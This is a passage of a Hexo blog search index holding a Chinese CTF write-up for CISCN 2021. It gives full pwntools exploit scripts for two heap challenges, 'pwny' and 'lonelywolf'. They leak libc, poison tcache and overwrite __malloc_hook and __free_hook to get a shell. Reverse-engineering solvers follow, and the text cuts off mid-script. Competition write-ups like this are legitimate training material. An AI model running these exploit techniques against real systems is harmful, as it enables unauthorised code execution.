-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
1726 lines (1377 loc) · 511 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CISCN_2021</title>
<url>/article/CISCN_2021/</url>
<content><</p>
<p><img src="/article/CISCN_2021/image-20210517195700168.png" alt="image-20210517195700168"></p>
<p><img src="/article/CISCN_2021/image-20210517195801362.png" alt="image-20210517195801362"></p>
<h3 id="2、leak-libc"><a href="#2、leak-libc" class="headerlink" title="2、leak libc"></a>2、leak libc</h3><p><img src="/article/CISCN_2021/image-20210602204143302.png" alt="image-20210602204143302"></p>
<p>0x202060 - 0x202040 = 0x20 = 32 ,32/8 = 4</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFC</span>)) <span class="comment"># -4</span></span><br></pre></td></tr></table></figure>
<h3 id="3、计算数组addr"><a href="#3、计算数组addr" class="headerlink" title="3、计算数组addr"></a>3、计算数组addr</h3><p><img src="/article/CISCN_2021/image-20210602204433065.png" alt="image-20210602204433065"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))<span class="comment"># -11</span></span><br></pre></td></tr></table></figure>
<h3 id="4、修改hook"><a href="#4、修改hook" class="headerlink" title="4、修改hook"></a>4、修改hook</h3><p>修改 malloc_hook 指向 realloc + n , realloc 指向 one_gadget</p>
<h3 id="exp:"><a href="#exp:" class="headerlink" title="exp:"></a>exp:</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./pwny'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node3.buuoj.cn'</span>,<span class="number">29811</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946 12345</span></span><br><span class="line"></span><br><span class="line">elf = ELF (<span class="string">'pwny'</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc-2.27.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendafter(<span class="string">'Index: '</span>,index)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">':'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write2</span>(<span class="params">index,addr</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">':'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.send(addr)</span><br><span class="line"></span><br><span class="line">write(<span class="number">0x100</span>)</span><br><span class="line">write(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFC</span>)) <span class="comment"># -4</span></span><br><span class="line">p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line">stderr = <span class="built_in">int</span>(p.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">libc_base = stderr - libc.sym[<span class="string">'_IO_2_1_stderr_'</span>]</span><br><span class="line">log.info(<span class="string">'libc_base:0x%x'</span>,libc_base)</span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))<span class="comment"># -11</span></span><br><span class="line">p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line">bss = <span class="built_in">int</span>(p.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">one_gadget = [<span class="number">0x4f3d5</span>,<span class="number">0x4f432</span>,<span class="number">0x10a41c</span>,<span class="number">0xe546f</span>,<span class="number">0xe5617</span>,<span class="number">0xe561e</span>,<span class="number">0xe5622</span>,<span class="number">0x10a428</span>]</span><br><span class="line">one = one_gadget[<span class="number">1</span>] + libc_base</span><br><span class="line"></span><br><span class="line">offset1 = (libc_base + libc.sym[<span class="string">'__malloc_hook'</span>] - (bss + <span class="number">0x58</span> + <span class="number">8</span>))/<span class="number">8</span></span><br><span class="line">offset2 = (libc_base + libc.sym[<span class="string">'__malloc_hook'</span>] - (bss + <span class="number">0x58</span>))/<span class="number">8</span></span><br><span class="line">realloc_off = <span class="number">4</span></span><br><span class="line"></span><br><span class="line">write2(offset2,p64(libc_base + libc.symbols[<span class="string">'realloc'</span>] + realloc_off))</span><br><span class="line">write2(offset1,p64(one))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">': '</span>,<span class="string">'5'</span> * <span class="number">0x400</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="longlywolf"><a href="#longlywolf" class="headerlink" title="longlywolf"></a>longlywolf</h2><p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"lonelywolf"</span>)</span><br><span class="line"><span class="comment">#p = remote("124.71.230.240","26077")</span></span><br><span class="line">libc = ELF(<span class="string">"lonelywolf"</span>).libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"1"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"> p.recvuntil(<span class="string">"Size: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">data</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"2"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"> p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line"> p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"3"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>():</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"4"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)</span><br><span class="line"></span><br><span class="line">free()</span><br><span class="line">edit(p64(<span class="number">0</span>)*<span class="number">2</span>+<span class="string">'\n'</span>)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line">heap = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>)-<span class="number">0x260</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(heap)</span><br><span class="line"></span><br><span class="line">edit(p64(heap+<span class="number">0x10</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)<span class="comment"># in tcache_head add chunk (without head) </span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0x0801010000000000</span>) + p64(<span class="number">0</span>)*<span class="number">12</span> + p64(heap+<span class="number">0x250</span>) + p64(heap+<span class="number">0x260</span>))</span><br><span class="line"><span class="comment"># 0x90 0x80 0x70</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x70 0x80</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#add chunk (without head)</span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>)+p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment">#edit chunk size,and overlapping next chunk</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x38</span>) <span class="comment"># add a nobody chunk</span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)+<span class="string">'\n'</span>) <span class="comment"># edit </span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)<span class="comment"># tcache chunk_addr</span></span><br><span class="line"></span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line">libc.address = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>) - <span class="number">0x3ebca0</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc.address)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">edit(p64(libc.sym[<span class="string">'__free_hook'</span>]-<span class="number">8</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">edit(<span class="string">'/bin/sh\x00'</span>+p64(libc.sym[<span class="string">'system'</span>])+<span class="string">'\n'</span>)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h1><h2 id="game"><a href="#game" class="headerlink" title="game"></a>game</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">a=<span class="string">'12345678'</span></span><br><span class="line">b=[]</span><br><span class="line">c=[<span class="number">0xa3</span>,<span class="number">0x1a</span>,<span class="number">0xe3</span>,<span class="number">0x69</span>,<span class="number">0x2f</span>,<span class="number">0xbb</span>,<span class="number">0x1a</span>,<span class="number">0x84</span>,<span class="number">0x65</span>,<span class="number">0xc2</span>,<span class="number">0xad</span>,<span class="number">0xad</span>,<span class="number">0x9e</span>,<span class="number">0x96</span>,<span class="number">0x5</span>,<span class="number">0x2</span>,<span class="number">0x1f</span>,<span class="number">0x8e</span>,<span class="number">0x36</span>,<span class="number">0x4f</span>,<span class="number">0xe1</span>,<span class="number">0xeb</span>,<span class="number">0xaf</span>,<span class="number">0xf0</span>,<span class="number">0xea</span>,<span class="number">0xc4</span>,<span class="number">0xa8</span>,<span class="number">0x2d</span>,<span class="number">0x42</span>,<span class="number">0xc7</span>,<span class="number">0x6e</span>,<span class="number">0x3f</span>,<span class="number">0xb0</span>,<span class="number">0xd3</span>,<span class="number">0xcc</span>,<span class="number">0x78</span>,<span class="number">0xf9</span>,<span class="number">0x98</span>,<span class="number">0x3f</span>]</span><br><span class="line">d=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line"> b.append(i)</span><br><span class="line"></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line"> g=b[i]</span><br><span class="line"> n=(n+g+<span class="built_in">ord</span>(a[i%<span class="number">8</span>]))%<span class="number">256</span></span><br><span class="line"> b[i]=b[n]</span><br><span class="line"> b[n]=g</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)):</span><br><span class="line"> c[i]=c[i]^<span class="built_in">ord</span>(a[i%<span class="number">8</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)//<span class="number">3</span>):</span><br><span class="line"> c[<span class="number">3</span>*i+<span class="number">1</span>]=c[<span class="number">3</span>*i+<span class="number">1</span>]^c[<span class="number">3</span>*i]</span><br><span class="line"> c[<span class="number">3</span>*i+<span class="number">2</span>]=c[<span class="number">3</span>*i+<span class="number">1</span>]^c[<span class="number">3</span>*i+<span class="number">2</span>]</span><br><span class="line"> c[<span class="number">3</span>*i]=c[<span class="number">3</span>*i+<span class="number">2</span>]^c[<span class="number">3</span>*i]</span><br><span class="line"></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line">m=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">39</span>):</span><br><span class="line"> n=(n+<span class="number">1</span>)%<span class="number">256</span></span><br><span class="line"> g=b[n]</span><br><span class="line"> m=(m+g)%<span class="number">256</span></span><br><span class="line"> b[n]=b[m]</span><br><span class="line"> b[m]=g</span><br><span class="line"> c[i]^=b[(g+b[n])%<span class="number">256</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)):</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(c[i]),end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<h2 id="babybc"><a href="#babybc" class="headerlink" title="babybc"></a>babybc</h2><p>用到 LLVM,再IDA打开</p>
<p>两个函数,写了各种限制</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">横</span><br><span class="line">row 0001 1000 2001 0000 1010</span><br><span class="line">map[0][3] > map[0][4]</span><br><span class="line">map[1][0] > map[1][1]</span><br><span class="line">map[2][0] < map[2][1]</span><br><span class="line">map[2][3] > map[2][4]</span><br><span class="line">map[4][0] > map[4][1]</span><br><span class="line">map[4][2] > map[4][3]</span><br><span class="line"></span><br><span class="line">纵</span><br><span class="line">col 00202 00000 00010 01001</span><br><span class="line">map[0][2] > map[1][2]</span><br><span class="line">map[0][4] > map[1][4]</span><br><span class="line">map[2][3] < map[3][3]</span><br><span class="line">map[3][1] < map[4][1]</span><br><span class="line">map[3][4] < map[4][3]</span><br></pre></td></tr></table></figure>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">num1 = []</span><br><span class="line">num2 = []</span><br><span class="line">num3 = []</span><br><span class="line">num4 = []</span><br><span class="line">num5 = []</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i2 == i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i4 <= i5):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num1.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i2 >= i1 <span class="keyword">or</span> i2 == <span class="number">5</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num2.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i1 >= i2):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 != <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 >= <span class="number">3</span> <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i5 >= i4):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num3.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 != <span class="number">3</span> <span class="keyword">or</span> i4 == <span class="number">2</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num4.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i2 >= i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i3 <= i4 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span 